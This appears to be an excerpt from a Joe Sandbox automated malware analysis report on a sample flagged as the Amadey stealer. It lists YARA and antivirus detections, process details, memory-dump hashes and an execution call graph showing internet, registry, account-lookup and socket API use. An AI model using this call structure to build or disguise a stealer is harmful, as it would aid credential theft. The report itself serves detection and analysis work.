                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2288200287.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2247936497.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  Target ID:5
                  Start time:12:29:00
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0x220000
                  File size:1'870'848 bytes
                  MD5 hash:A3A83347AE8FCDEE6EC20F6BA13311C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2769975367.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Reset < >
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: df72378fa504d24db0e5dae29d00b2f39e98654f843485e0dfd6ff10924f82bd
                    • Instruction ID: ee803083c14e51abb9cbf65da76b0fc77cebf5eba05e324754c4406bd9e2c914
                    • Opcode Fuzzy Hash: df72378fa504d24db0e5dae29d00b2f39e98654f843485e0dfd6ff10924f82bd
                    • Instruction Fuzzy Hash: 7F21A1EB048124BEA126D5836A0CEF67E3FE6CB630332942BF507D9442E3D41E0DA971
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8445ff25b1276e280ed3199450a04866ec5b28caa146f6231a9c4968be409637
                    • Instruction ID: 7d08470f0e5b4dbb6d2f55c8c54a73b783642ce35ca94887ff9af002e04b11f0
                    • Opcode Fuzzy Hash: 8445ff25b1276e280ed3199450a04866ec5b28caa146f6231a9c4968be409637
                    • Instruction Fuzzy Hash: 2B21E1EB088124BEA116D5826A1CDF67F7EE6CB730332A426F546DD442E3D44E0EA971
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fdef59d864b43b6e9423bc21c2880f558e973e004a35f7b2aa008977bcc41366
                    • Instruction ID: 26275a09f41035aa09ae8f9b62ac83f300c33dcd7f579d016a802d29c7d62a43
                    • Opcode Fuzzy Hash: fdef59d864b43b6e9423bc21c2880f558e973e004a35f7b2aa008977bcc41366
                    • Instruction Fuzzy Hash: 5601D6AB048024BF655AD983661CDFA7F3AE6CF330731A426F6479C442E3941E0DAA31
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f57b27d4f6c33679ad5d09ef20d656bc6f8e033132c5a47730199ecf673280fb
                    • Instruction ID: 1020823b89914b00945ade84d9cf5e3f34a0a55c5cb7ddc7e17127b4aa22cad2
                    • Opcode Fuzzy Hash: f57b27d4f6c33679ad5d09ef20d656bc6f8e033132c5a47730199ecf673280fb
                    • Instruction Fuzzy Hash: A4F0FFB605C020AF916DDA43550DDBA3B6AE7CE330322A42BF6479E181D3242E099D24
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7adfba99538dadd571555360035404f4e39819daaa67a86e37c545076ab03b7d
                    • Instruction ID: 8c2cd5bdbcca989687a46e757c75ffdbb1d96dfeb084695e2cfc8d4965cacb2b
                    • Opcode Fuzzy Hash: 7adfba99538dadd571555360035404f4e39819daaa67a86e37c545076ab03b7d
                    • Instruction Fuzzy Hash: E1F02BA719C420AFA559D543590CDFA3F36E7DE2303227517F242CE481D3546A0E9D71
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d77433fecf8feebae40ef58d5554b60070b6ce609455dc15ca2f5f3483dec7e
                    • Instruction ID: 0bdf8d3380ab91a3928bf4f29209af2b07715c3bd1546a6edce3c73310edc1cb
                    • Opcode Fuzzy Hash: 0d77433fecf8feebae40ef58d5554b60070b6ce609455dc15ca2f5f3483dec7e
                    • Instruction Fuzzy Hash: 55F024B715C128BF9119E583551DEFA6E6BABCE230362B427FB42EE481E3081D098D61
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1df9bbf37da2eaf8a3b077a0bc67f753150ed77dc183080e437aa3afae2da213
                    • Instruction ID: d6da8ef7168b1ae070d5ff616349858c2c2893ae7a867e418c18ad32402c2f98
                    • Opcode Fuzzy Hash: 1df9bbf37da2eaf8a3b077a0bc67f753150ed77dc183080e437aa3afae2da213
                    • Instruction Fuzzy Hash: 3EE0DFA6098431BF402AE583494DEBA7E6FABCE230362B016F203DC581A349680A9D30
                    Memory Dump Source
                    • Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5140000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b11893b899719c29541755ad8f7fd3f73c247bf0ca76b23157b2995ea395721
                    • Instruction ID: 3d375b1426d9956675c83fa1f25060214cb5016e42d0f0ac93e242854189c836
                    • Opcode Fuzzy Hash: 7b11893b899719c29541755ad8f7fd3f73c247bf0ca76b23157b2995ea395721
                    • Instruction Fuzzy Hash: 1DE026D20880367F546AC093050CEF71E6F67CE6303727267B263AC4C2D348690B5830

                    Execution Graph

                    Execution Coverage:7.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.9%
                    Total number of Nodes:571
                    Total number of Limit Nodes:34
                    execution_graph 11770 227400 11771 227435 shared_ptr 11770->11771 11775 22752f shared_ptr 11771->11775 11776 23d041 11771->11776 11773 2275bd 11773->11775 11780 23cff7 11773->11780 11778 23d052 11776->11778 11777 23d05a 11777->11773 11778->11777 11784 23d0c9 11778->11784 11781 23d007 11780->11781 11782 23d0ab RtlWakeAllConditionVariable 11781->11782 11783 23d0af 11781->11783 11782->11775 11783->11775 11785 23d0f0 11784->11785 11786 23d0d7 SleepConditionVariableCS 11784->11786 11785->11778 11786->11785 11788 238700 11789 23875a __cftof 11788->11789 11795 239ae0 11789->11795 11791 238784 11794 23879c 11791->11794 11799 2243b0 11791->11799 11793 238809 std::_Throw_future_error 11796 239b15 11795->11796 11805 222ca0 11796->11805 11798 239b46 11798->11791 11800 23be0f InitOnceExecuteOnce 11799->11800 11801 2243ca 11800->11801 11802 2243d1 11801->11802 11803 256beb 9 API calls 11801->11803 11802->11793 11804 2243e4 11803->11804 11806 222cdd 11805->11806 11814 23be0f 11806->11814 11808 222d06 11809 222d11 11808->11809 11810 222d48 11808->11810 11817 23be27 11808->11817 11809->11798 11824 222400 11810->11824 11827 23cb61 11814->11827 11818 23be33 std::_Xinvalid_argument 11817->11818 11819 23bea3 11818->11819 11820 23be9a 11818->11820 11837 222aa0 11819->11837 11831 23bdaf 11820->11831 11823 23be9f 11823->11810 11863 23b506 11824->11863 11826 222432 11828 23cb6f InitOnceExecuteOnce 11827->11828 11830 23be22 11827->11830 11828->11830 11830->11808 11832 23cb61 InitOnceExecuteOnce 11831->11832 11833 23bdc7 11832->11833 11834 23bdce 11833->11834 11851 256beb 11833->11851 11834->11823 11836 23bdd7 11836->11823 11838 23be0f InitOnceExecuteOnce 11837->11838 11841 222ab4 11838->11841 11839 222abf 11839->11823 11840 258aaf __cftof 4 API calls 11842 256c26 11840->11842 11841->11839 11841->11840 11843 256c35 11842->11843 11844 256c43 11842->11844 11845 256c99 9 API calls 11843->11845 11846 2568bd 4 API calls 11844->11846 11847 256c3f 11845->11847 11848 256c5d 11846->11848 11847->11823 11849 256c99 9 API calls 11848->11849 11850 256c71 __freea 11848->11850 11849->11850 11850->11823 11858 256bf7 11851->11858 11852 258aaf __cftof 4 API calls 11853 256c26 11852->11853 11854 256c35 11853->11854 11855 256c43 11853->11855 11856 256c99 9 API calls 11854->11856 11857 2568bd 4 API calls 11855->11857 11859 256c3f 11856->11859 11860 256c5d 11857->11860 11858->11852 11859->11836 11861 256c99 9 API calls 11860->11861 11862 256c71 __freea 11860->11862 11861->11862 11862->11836 11865 23b521 std::_Xinvalid_argument 11863->11865 11864 258aaf __cftof 4 API calls 11866 23b5cf 11864->11866 11865->11864 11867 23b588 __cftof 11865->11867 11867->11826 11889 23a140 11890 23a1c0 11889->11890 11896 237040 11890->11896 11892 23a1fc shared_ptr 11893 23a3ee shared_ptr 11892->11893 11900 223ea0 11892->11900 11895 23a3d6 11898 237081 __cftof __Mtx_init_in_situ 11896->11898 11897 2372b6 11897->11892 11898->11897 11906 222e80 11898->11906 11901 223f08 11900->11901 11905 223ede 11900->11905 11903 223f18 11901->11903 11976 222bc0 11901->11976 11903->11895 11905->11895 11907 222ec6 11906->11907 11911 222f2f 11906->11911 11940 23c5dc 11907->11940 11910 222faf 11910->11897 11911->11910 11917 23c5dc GetSystemTimePreciseAsFileTime 11911->11917 11912 222fde 11943 23c19a 11912->11943 11914 222fe4 11915 23c19a 10 API calls 11914->11915 11918 222f79 11915->11918 11916 222edd __Mtx_unlock 11916->11911 11916->11914 11917->11918 11919 23c19a 10 API calls 11918->11919 11920 222f80 __Mtx_unlock 11918->11920 11919->11920 11921 23c19a 10 API calls 11920->11921 11922 222f98 __Cnd_broadcast 11920->11922 11921->11922 11922->11910 11923 23c19a 10 API calls 11922->11923 11924 222ffc 11923->11924 11925 23c5dc GetSystemTimePreciseAsFileTime 11924->11925 11934 223040 shared_ptr __Mtx_unlock 11925->11934 11926 223185 11927 23c19a 10 API calls 11926->11927 11928 22318b 11927->11928 11929 23c19a 10 API calls 11928->11929 11930 223191 11929->11930 11931 23c19a 10 API calls 11930->11931 11932 223153 __Mtx_unlock 11931->11932 11933 223167 11932->11933 11935 23c19a 10 API calls 11932->11935 11933->11897 11934->11926 11934->11928 11934->11933 11937 23c5dc GetSystemTimePreciseAsFileTime 11934->11937 11936 22319d 11935->11936 11938 22311f 11937->11938 11938->11926 11938->11930 11938->11932 11947 23bc7c 11938->11947 11950 23c382 11940->11950 11942 222ed2 11942->11912 11942->11916 11944 23c1c2 11943->11944 11945 23c1a4 11943->11945 11944->11944 11945->11944 11967 23c1c7 11945->11967 11970 23baa2 11947->11970 11949 23bc8c 11949->11938 11951 23c3d8 11950->11951 11953 23c3aa 11950->11953 11951->11953 11956 23ce9b 11951->11956 11953->11942 11954 23c42d __Xtime_diff_to_millis2 11954->11953 11955 23ce9b _xtime_get GetSystemTimePreciseAsFileTime 11954->11955 11955->11954 11957 23ceaa 11956->11957 11959 23ceb7 __aulldvrm 11956->11959 11957->11959 11960 23ce74 11957->11960 11959->11954 11963 23cb1a 11960->11963 11964 23cb2b GetSystemTimePreciseAsFileTime 11963->11964 11965 23cb37 11963->11965 11964->11965 11965->11959 11968 222aa0 10 API calls 11967->11968 11969 23c1de std::_Xinvalid_argument 11968->11969 11969->11945 11971 23bacc 11970->11971 11972 23ce9b _xtime_get GetSystemTimePreciseAsFileTime 11971->11972 11973 23bad4 __Xtime_diff_to_millis2 11971->11973 11974 23baff __Xtime_diff_to_millis2 11972->11974 11973->11949 11974->11973 11975 23ce9b _xtime_get GetSystemTimePreciseAsFileTime 11974->11975 11975->11973 11977 222bce 11976->11977 11983 23b777 11977->11983 11979 222c02 11980 222c09 11979->11980 11989 222c40 11979->11989 11980->11895 11982 222c18 std::_Xinvalid_argument 11984 23b784 11983->11984 11988 23b7a3 Concurrency::details::_Reschedule_chore 11983->11988 11992 23caa7 11984->11992 11986 23b794 11986->11988 11994 23b74e 11986->11994 11988->11979 12000 23b72b 11989->12000 11991 222c72 shared_ptr 11991->11982 11993 23cac2 CreateThreadpoolWork 11992->11993 11993->11986 11996 23b757 Concurrency::details::_Reschedule_chore 11994->11996 11998 23ccfc 11996->11998 11997 23b771 11997->11988 11999 23cd11 TpPostWork 11998->11999 11999->11997 12001 23b737 12000->12001 12002 23b747 12000->12002 12001->12002 12004 23c9a8 12001->12004 12002->11991 12005 23c9bd TpReleaseWork 12004->12005 12005->12002 12044 236ae0 12045 236b10 12044->12045 12048 2346c0 12045->12048 12047 236b5c Sleep 12047->12045 12051 2346fb 12048->12051 12064 234d80 shared_ptr 12048->12064 12049 234e69 shared_ptr 12049->12047 12051->12064 12069 22bd60 12051->12069 12053 234f25 shared_ptr 12054 234fee shared_ptr 12053->12054 12058 236ab6 12053->12058 12095 227d00 12054->12095 12056 234ffd 12101 2282b0 12056->12101 12060 2346c0 16 API calls 12058->12060 12059 234a0d 12061 22bd60 4 API calls 12059->12061 12059->12064 12062 236b5c Sleep 12060->12062 12066 234a72 shared_ptr 12061->12066 12062->12058 12063 234753 shared_ptr __dosmaperr 12063->12059 12065 258979 4 API calls 12063->12065 12064->12049 12085 2265b0 12064->12085 12065->12059 12066->12064 12078 2342a0 12066->12078 12068 235016 shared_ptr 12068->12047 12070 22bdb2 12069->12070 12072 22c14e shared_ptr 12069->12072 12071 22bdc6 InternetOpenW InternetConnectA 12070->12071 12070->12072 12073 22be3d shared_ptr 12071->12073 12072->12063 12074 22bf13 HttpSendRequestA 12073->12074 12075 22bf2b shared_ptr 12074->12075 12076 22bfb3 InternetReadFile 12075->12076 12077 22bfda 12076->12077 12079 2342e2 12078->12079 12081 234556 12079->12081 12083 234308 shared_ptr 12079->12083 12080 234520 shared_ptr 12080->12064 12082 233550 9 API calls 12081->12082 12082->12080 12083->12080 12105 233550 12083->12105 12094 4ce01d8 12085->12094 12086 22660f LookupAccountNameA 12087 226662 12086->12087 12088 222280 4 API calls 12087->12088 12089 226699 shared_ptr 12088->12089 12090 222280 4 API calls 12089->12090 12091 226822 shared_ptr 12089->12091 12092 226727 shared_ptr 12090->12092 12091->12053 12092->12091 12093 222280 4 API calls 12092->12093 12093->12092 12094->12086 12097 227d66 shared_ptr __cftof 12095->12097 12096 227ea3 GetNativeSystemInfo 12098 227ea7 12096->12098 12097->12096 12097->12098 12100 227eb8 shared_ptr 12097->12100 12098->12100 12173 258a81 12098->12173 12100->12056 12103 228315 shared_ptr __cftof 12101->12103 12102 228333 12102->12068 12103->12102 12104 228454 GetNativeSystemInfo 12103->12104 12104->12102 12106 23358f shared_ptr 12105->12106 12113 233ab2 shared_ptr std::_Xinvalid_argument 12105->12113 12110 2338f5 shared_ptr __dosmaperr 12106->12110 12106->12113 12116 22aca0 12106->12116 12107 258979 4 API calls 12109 233a8a 12107->12109 12111 233e52 12109->12111 12109->12113 12114 233b9d 12109->12114 12110->12107 12110->12113 12133 232e20 12111->12133 12113->12083 12121 231dd0 12114->12121 12118 22adf0 __cftof 12116->12118 12117 22ae16 shared_ptr 12117->12110 12118->12117 12146 225500 12118->12146 12120 22af7e 12122 231e6b shared_ptr __dosmaperr 12121->12122 12123 258979 4 API calls 12122->12123 12130 231e78 shared_ptr std::_Xinvalid_argument 12122->12130 12127 232265 shared_ptr 12123->12127 12124 256659 RtlAllocateHeap 12125 23267a 12124->12125 12126 2566e7 4 API calls 12125->12126 12125->12130 12128 23268b shared_ptr __dosmaperr 12126->12128 12127->12124 12127->12130 12129 258979 4 API calls 12128->12129 12128->12130 12131 232759 12129->12131 12130->12113 12131->12130 12132 225df0 2 API calls 12131->12132 12132->12130 12134 232ec5 __cftof 12133->12134 12135 2332f2 InternetCloseHandle InternetCloseHandle 12134->12135 12136 233331 shared_ptr 12135->12136 12138 22aca0 4 API calls 12136->12138 12140 2338f5 shared_ptr __dosmaperr 12136->12140 12143 23351a shared_ptr std::_Xinvalid_argument 12136->12143 12137 258979 4 API calls 12139 233a8a 12137->12139 12138->12140 12141 233e52 12139->12141 12139->12143 12144 233b9d 12139->12144 12140->12137 12140->12143 12142 232e20 7 API calls 12141->12142 12142->12143 12143->12113 12145 231dd0 7 API calls 12144->12145 12145->12143 12147 225520 12146->12147 12149 225620 12147->12149 12150 222280 12147->12150 12149->12120 12153 222240 12150->12153 12154 222256 12153->12154 12157 258667 12154->12157 12160 257456 12157->12160 12159 222264 12159->12147 12161 257496 12160->12161 12165 25747e __cftof __dosmaperr 12160->12165 12162 25683a __cftof 4 API calls 12161->12162 12161->12165 12163 2574ae 12162->12163 12166 257a11 12163->12166 12165->12159 12168 257a22 12166->12168 12167 257a31 __cftof __dosmaperr 12167->12165 12168->12167 12169 257c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12168->12169 12170 257c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12168->12170 12171 257d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12168->12171 12172 257fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12168->12172 12169->12168 12170->12168 12171->12168 12172->12168 12174 2586d7 4 API calls 12173->12174 12175 258a9f 12174->12175 12175->12100 11663 25d6ef 11666 25d6fc __cftof 11663->11666 11664 25d727 RtlAllocateHeap 11665 25d73a __dosmaperr 11664->11665 11664->11666 11666->11664 11666->11665 12176 23b7e9 12177 23b6e5 11 API calls 12176->12177 12179 23b811 Concurrency::details::_Reschedule_chore 12177->12179 12178 23b836 12181 23b648 11 API calls 12178->12181 12179->12178 12183 23cade 12179->12183 12182 23b84e 12181->12182 12184 23cafc 12183->12184 12185 23caec TpCallbackUnloadDllOnCompletion 12183->12185 12184->12178 12185->12184 11667 256beb 11674 256bf7 11667->11674 11668 258aaf __cftof 4 API calls 11669 256c26 11668->11669 11670 256c35 11669->11670 11671 256c43 11669->11671 11672 256c99 9 API calls 11670->11672 11679 2568bd 11671->11679 11675 256c3f 11672->11675 11674->11668 11676 256c5d 11678 256c71 __freea 11676->11678 11682 256c99 11676->11682 11680 25683a __cftof 4 API calls 11679->11680 11681 2568cf 11680->11681 11681->11676 11683 256cc4 __cftof 11682->11683 11689 256ca7 __cftof __dosmaperr 11682->11689 11684 256d06 CreateFileW 11683->11684 11690 256cea __cftof __dosmaperr 11683->11690 11685 256d38 11684->11685 11686 256d2a 11684->11686 11705 256d77 11685->11705 11691 256e01 GetFileType 11686->11691 11689->11678 11690->11678 11692 256e3c 11691->11692 11696 256ed2 __dosmaperr 11691->11696 11693 256e56 __cftof 11692->11693 11727 257177 11692->11727 11695 256e75 GetFileInformationByHandle 11693->11695 11693->11696 11695->11696 11697 256e8b 11695->11697 11696->11690 11713 2570c9 11697->11713 11701 256ea8 11702 256f71 SystemTimeToTzSpecificLocalTime 11701->11702 11703 256ebb 11702->11703 11704 256f71 SystemTimeToTzSpecificLocalTime 11703->11704 11704->11696 11746 257314 11705->11746 11707 256d85 11708 256d8a __dosmaperr 11707->11708 11709 2570c9 4 API calls 11707->11709 11708->11690 11710 256da3 11709->11710 11711 257177 RtlAllocateHeap 11710->11711 11712 256dc2 11711->11712 11712->11690 11715 2570df _wcsrchr 11713->11715 11714 256e97 11723 256f71 11714->11723 11715->11714 11731 25b9e4 11715->11731 11717 257123 11717->11714 11718 25b9e4 4 API calls 11717->11718 11719 257134 11718->11719 11719->11714 11720 25b9e4 4 API calls 11719->11720 11721 257145 11720->11721 11721->11714 11722 25b9e4 4 API calls 11721->11722 11722->11714 11724 256f89 11723->11724 11725 256fa9 SystemTimeToTzSpecificLocalTime 11724->11725 11726 256f8f 11724->11726 11725->11726 11726->11701 11728 257190 11727->11728 11730 2571a4 __dosmaperr 11728->11730 11742 25b568 11728->11742 11730->11693 11733 25b9f2 11731->11733 11735 25b9f8 __cftof __dosmaperr 11733->11735 11736 25ba2d 11733->11736 11734 25ba28 11734->11717 11735->11717 11737 25ba57 11736->11737 11740 25ba3d __cftof __dosmaperr 11736->11740 11738 25683a __cftof 4 API calls 11737->11738 11737->11740 11739 25ba81 11738->11739 11739->11740 11741 25b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 11739->11741 11740->11734 11741->11739 11743 25b592 __cftof 11742->11743 11744 25d6ef RtlAllocateHeap 11743->11744 11745 25b5ae __dosmaperr __freea 11743->11745 11744->11745 11745->11730 11747 257338 11746->11747 11749 25733e 11747->11749 11750 257036 11747->11750 11749->11707 11751 257042 __dosmaperr 11750->11751 11756 25b87b 11751->11756 11753 25705a __dosmaperr 11754 25b87b RtlAllocateHeap 11753->11754 11755 257068 11753->11755 11754->11755 11755->11749 11759 25b6de 11756->11759 11758 25b894 11758->11753 11760 25b6ee 11759->11760 11762 25b6f5 11760->11762 11763 261ef8 11760->11763 11762->11758 11766 261d22 11763->11766 11765 261f0f 11765->11762 11767 261d54 11766->11767 11769 261d40 __cftof __dosmaperr 11766->11769 11768 25b568 RtlAllocateHeap 11767->11768 11767->11769 11768->11769 11769->11765 11884 256974 11885 256982 11884->11885 11886 25698c 11884->11886 11887 2568bd 4 API calls 11886->11887 11888 2569a6 __freea 11887->11888 11868 22e410 11870 22e419 11868->11870 11871 22e435 11868->11871 11870->11871 11872 22e270 11870->11872 11873 22e280 __dosmaperr 11872->11873 11874 258979 4 API calls 11873->11874 11876 22e2bd std::_Xinvalid_argument 11874->11876 11875 22e435 11875->11870 11876->11875 11877 22e270 4 API calls 11876->11877 11877->11876 12037 2286b0 12038 2286b6 12037->12038 12039 256659 RtlAllocateHeap 12038->12039 12040 2286c3 12039->12040 12041 2286d6 12040->12041 12042 2566e7 4 API calls 12040->12042 12043 2286d0 12042->12043 12187 22dfd0 recv 12188 22e032 recv 12187->12188 12189 22e067 recv 12188->12189 12191 22e0a1 12189->12191 12190 22e1c3 12191->12190 12192 23c5dc GetSystemTimePreciseAsFileTime 12191->12192 12193 22e1fe 12192->12193 12194 23c19a 10 API calls 12193->12194 12195 22e268 12194->12195 11504 231dd0 11505 231e6b shared_ptr __dosmaperr 11504->11505 11513 231e78 shared_ptr std::_Xinvalid_argument 11505->11513 11516 258979 11505->11516 11510 232265 shared_ptr 11510->11513 11520 256659 11510->11520 11511 23268b shared_ptr __dosmaperr 11512 258979 4 API calls 11511->11512 11511->11513 11514 232759 11512->11514 11514->11513 11527 225df0 11514->11527 11517 258994 11516->11517 11534 2586d7 11517->11534 11519 25899e 11519->11510 11624 2565a2 11520->11624 11522 23267a 11522->11513 11523 2566e7 11522->11523 11524 2566f3 11523->11524 11525 2566fd __cftof __dosmaperr 11524->11525 11640 256670 11524->11640 11525->11511 11529 225e28 11527->11529 11528 225f0e shared_ptr 11528->11513 11529->11528 11530 226060 RegOpenKeyExA 11529->11530 11531 22645a shared_ptr 11530->11531 11533 2260b3 __cftof 11530->11533 11531->11513 11532 226153 RegEnumValueW 11532->11533 11533->11531 11533->11532 11535 2586e9 11534->11535 11539 2586fe __cftof __dosmaperr 11535->11539 11540 25683a 11535->11540 11538 25872e 11538->11539 11546 258925 11538->11546 11539->11519 11541 25685a 11540->11541 11545 256851 11540->11545 11541->11545 11552 25b4bb 11541->11552 11545->11538 11547 258962 11546->11547 11548 258932 11546->11548 11617 25d2e9 11547->11617 11550 258941 __fassign 11548->11550 11612 25d30d 11548->11612 11550->11538 11553 256890 11552->11553 11554 25b4ce 11552->11554 11556 25b4e8 11553->11556 11554->11553 11560 25f46b 11554->11560 11557 25b510 11556->11557 11558 25b4fb 11556->11558 11557->11545 11558->11557 11595 25e571 11558->11595 11562 25f477 __cftof 11560->11562 11561 25f4c6 11561->11553 11562->11561 11565 258aaf 11562->11565 11564 25f4eb 11566 258ab4 __cftof 11565->11566 11567 258abf 11566->11567 11576 25d4f4 11566->11576 11573 25651d 11567->11573 11570 25d727 RtlAllocateHeap 11571 25d73a __dosmaperr 11570->11571 11572 258af2 __cftof 11570->11572 11571->11564 11572->11570 11572->11571 11583 2563f7 11573->11583 11577 25d500 __cftof 11576->11577 11578 25651d __cftof 2 API calls 11577->11578 11579 25d55c __cftof __dosmaperr 11577->11579 11582 25d6ee __cftof 11578->11582 11579->11567 11580 25d727 RtlAllocateHeap 11581 25d73a __dosmaperr 11580->11581 11580->11582 11581->11567 11582->11580 11582->11581 11584 256405 __cftof 11583->11584 11585 256450 11584->11585 11588 25645b 11584->11588 11585->11572 11593 25a1c2 GetPEB 11588->11593 11590 256465 11591 25646a GetPEB 11590->11591 11592 25647a __cftof 11590->11592 11591->11592 11594 25a1dc __cftof 11593->11594 11594->11590 11596 25e57b 11595->11596 11599 25e489 11596->11599 11598 25e581 11598->11557 11603 25e495 __cftof __freea 11599->11603 11600 25e4b6 11600->11598 11601 258aaf __cftof 4 API calls 11602 25e528 11601->11602 11604 25e564 11602->11604 11608 25a5ee 11602->11608 11603->11600 11603->11601 11604->11598 11609 25a611 11608->11609 11610 258aaf __cftof 4 API calls 11609->11610 11611 25a687 11610->11611 11613 25683a __cftof 4 API calls 11612->11613 11614 25d32a 11613->11614 11616 25d33a 11614->11616 11621 25f07f 11614->11621 11616->11550 11618 25d2f4 11617->11618 11619 25b4bb __cftof 4 API calls 11618->11619 11620 25d304 11619->11620 11620->11550 11622 25683a __cftof 4 API calls 11621->11622 11623 25f09f __cftof __fassign __freea 11622->11623 11623->11616 11625 2565ae 11624->11625 11627 2565b5 __cftof __dosmaperr 11625->11627 11628 25a783 11625->11628 11627->11522 11629 25a78f 11628->11629 11632 25a827 11629->11632 11631 25a7aa 11631->11627 11635 25a84a 11632->11635 11634 25a890 __freea 11634->11631 11635->11634 11635->11635 11636 25d6ef 11635->11636 11639 25d6fc __cftof 11636->11639 11637 25d727 RtlAllocateHeap 11638 25d73a __dosmaperr 11637->11638 11637->11639 11638->11634 11639->11637 11639->11638 11641 256692 11640->11641 11643 25667d __cftof __dosmaperr __freea 11640->11643 11641->11643 11644 259ef9 11641->11644 11643->11525 11645 259f11 11644->11645 11647 259f36 11644->11647 11645->11647 11648 2602f8 11645->11648 11647->11643 11649 260304 11648->11649 11651 26030c __cftof __dosmaperr 11649->11651 11652 2603ea 11649->11652 11651->11647 11653 26040c 11652->11653 11655 260410 __cftof __dosmaperr 11652->11655 11653->11655 11656 25fb7f 11653->11656 11655->11651 11657 25fbcc 11656->11657 11658 25683a __cftof 4 API calls 11657->11658 11659 25fbdb __cftof 11658->11659 11660 25d2e9 4 API calls 11659->11660 11661 25c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 11659->11661 11662 25fe7b 11659->11662 11660->11659 11661->11659 11662->11655 11878 239310 11879 239325 11878->11879 11883 239363 11878->11883 11880 23d041 SleepConditionVariableCS 11879->11880 11881 23932f 11880->11881 11882 23cff7 RtlWakeAllConditionVariable 11881->11882 11881->11883 11882->11883 12006 256559 12007 2563f7 __cftof 2 API calls 12006->12007 12008 25656a 12007->12008 12009 23b85e 12014 23b6e5 12009->12014 12011 23b886 12022 23b648 12011->12022 12013 23b89f 12015 23b6f1 Concurrency::details::_Reschedule_chore 12014->12015 12016 23b722 12015->12016 12017 23c5dc GetSystemTimePreciseAsFileTime 12015->12017 12016->12011 12018 23b706 12017->12018 12032 222ad0 12018->12032 12020 23b70c __Mtx_unlock 12021 222ad0 10 API calls 12020->12021 12021->12016 12023 23b654 Concurrency::details::_Reschedule_chore 12022->12023 12024 23c5dc GetSystemTimePreciseAsFileTime 12023->12024 12025 23b6ae 12023->12025 12026 23b669 12024->12026 12025->12013 12027 222ad0 10 API calls 12026->12027 12028 23b66f __Mtx_unlock 12027->12028 12029 222ad0 10 API calls 12028->12029 12030 23b68c __Cnd_broadcast 12029->12030 12030->12025 12031 222ad0 10 API calls 12030->12031 12031->12025 12033 222ada 12032->12033 12034 222adc 12032->12034 12033->12020 12035 23c19a 10 API calls 12034->12035 12036 222ae2 ___std_exception_copy 12035->12036 12036->12020

                    Control-flow Graph

                    • Executed
                    • Not Executed
